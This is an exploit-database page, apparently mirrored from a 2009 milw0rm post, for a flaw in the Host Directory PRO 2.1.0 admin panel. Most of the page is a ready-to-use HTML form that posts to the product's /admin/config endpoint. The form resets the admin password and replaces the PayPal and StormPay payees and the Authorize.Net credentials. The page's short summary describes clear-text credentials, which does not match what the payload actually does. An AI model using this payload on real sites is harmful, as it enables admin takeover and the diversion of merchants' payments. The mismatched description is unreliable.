header-logo
Suggest Exploit
vendor:
Host Directory PRO
by:
Unknown
5
CVSS
MEDIUM
Configuration vulnerability
311
CWE
Product Name: Host Directory PRO
Affected Version From: 2.1.2000
Affected Version To: 2.1.2000
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Change password Host Directory PRO 2.1.0

The web interface password and admin email are being stored in clear text in the HTML code of the form. This can allow an attacker to easily obtain these credentials.

Mitigation:

Store sensitive information such as passwords and email addresses in encrypted form. Use secure methods to transmit and handle sensitive data.
Source

Exploit-DB raw data:

<title>change password Host Directory PRO 2.1.0 </title>

 

<body bgcolor="#000000">

 

<tr><td class="setting">

<form name="config" action="http://demo-host-directory-pro.phphostdirectoryscript.com/admin/config" method="post">
<h4>Configuration</h4>

<table>
<tr>
  <td><font color="#FFFFFF">Web Interface Password</font></td>
  <td width="220" align="center"><font color="#FFFFFF"><input type="text" name="WebInterfacePassword" value="123456" style="width:200"></font></td>
</tr>
<tr>
  <td><font color="#FFFFFF">Admin Email</font></td>
  <td width="220" align="center"><font color="#FFFFFF"><input type="text" name="smtp_user" value="test2@test.com" style="width:200"></font></td>
</tr>
<tr><td colspan="2"><font color="#FFFFFF"><br></font></td></tr>

<tr>
  <td><font color="#FFFFFF">Receive <b>Authorize.Net</b></font></td>
  <td align="center">
  <font color="#FFFFFF">
  <input type="radio" name="ReceiveAuthorize" value="1"> On
  <input type="radio" name="ReceiveAuthorize" value="0" checked> Off
  </font>
  </td>
</tr>
<tr>
  <td><font color="#FFFFFF">Authorize login</font></td>
  <td align="center"><font color="#FFFFFF"><input type="text" name="AuthorizeLogin" value="q52Znp3E4p" style="width:200"></font></td>
</tr>
<tr>
  <td><font color="#FFFFFF">Authorize transactionKey</font></td>
  <td align="center"><font color="#FFFFFF"><input type="text" name="AuthorizeTransactionKey" value="9HLG4y9x6G33u2g3" style="width:200"></font></td>
</tr>
<tr><td colspan="2"><font color="#FFFFFF"><br></font></td></tr>

<tr>
  <td><font color="#FFFFFF">Receive <b>IntGold</b></font></td>
  <td align="center">
  <font color="#FFFFFF">
  <input type="radio" name="ReceiveIntGold" value="1"> On
  <input type="radio" name="ReceiveIntGold" value="0" checked> Off
  </font>
  </td>
</tr>
<tr>

  <td><font color="#FFFFFF">IntGold account #</font></td>
  <td align="center"><font color="#FFFFFF"><input type="text" name="IntGoldAccount" value="222" style="width:200"></font></td>
</tr>
<tr><td colspan="2"><font color="#FFFFFF"><br></font></td></tr>

<tr>
  <td><font color="#FFFFFF">Receive <b>StormPay</b></font></td>
  <td align="center">
  <font color="#FFFFFF">
  <input type="radio" name="ReceiveStormPay" value="1"> On
  <input type="radio" name="ReceiveStormPay" value="0" checked> Off
  </font>
  </td>
</tr>
<tr>
  <td><font color="#FFFFFF">StormPay payee</font></td>
  <td align="center"><font color="#FFFFFF"><input type="text" name="StormPayAccount" value="onlinesales@scriptsfrenzy.com" style="width:200"></font></td>
</tr>
<tr><td colspan="2"><font color="#FFFFFF"><br></font></td></tr>

<tr>
  <td><font color="#FFFFFF">Receive <b>PayPal</b></font></td>
  <td align="center">
  <font color="#FFFFFF">
  <input type="radio" name="ReceivePayPal" value="1" checked> On
  <input type="radio" name="ReceivePayPal" value="0"> Off
  </font>
  </td>
</tr>
<tr>
  <td><font color="#FFFFFF">PayPal payee</font></td>
  <td width="220" align="center"><font color="#FFFFFF"><input type="text" name="PayPalAccount" value="onlinesales@scriptsfrenzy.com" style="width:200"></font></td>
</tr>
<tr><td colspan="2"><font color="#FFFFFF"><br></font></td></tr>

<!--
<tr>
  <td>Receive <b>LinkPoint</b></td>
  <td align="center">
  <input type="radio" name="ReceiveLinkPoint" value="1"> On
  <input type="radio" name="ReceiveLinkPoint" value="0" checked> Off
  </td>
</tr>
<tr>
  <td>LinkPoint payee</td>
  <td align="center"><input type="text" name="LinkPointAccount" value="" style="width:200"></td>
</tr>
<tr><td colspan="2"><br></td></tr>

<tr>
  <td><b>Test mode</b><br>(Authorize.Net & StormPay only)</td>
  <td align="center">
  <input type="radio" name="TestMode" value="1" checked> On
  <input type="radio" name="TestMode" value="0"> Off
  </td>
</tr>
<tr><td colspan="2"><br></td></tr>
-->

<tr>
  <td colspan="2" align="center"><br><input type="submit" value="Update"></td>
</tr>
</table>


</td></tr>
</form>
</table>
<font size="5" color="#FFFFFF">CoD3d By :TiGeR-Dz<br>
<br>
E-mail : tiger.dz@live.com<br>
<br>
Script:Host Directory PRO 2.1.0 <br>
<br>
Home:http://www.phphostdirectoryscript.com/</font><p>
<br>
  </td>
  </tr>
  </table></td>
  </tr>
  <tr>
  <td class="sep_bottom"></td>
  </tr>
  </table>
</body>
</p>

</html>

# milw0rm.com [2009-06-04]

Navigation

Suggest Exploit

Services By CQR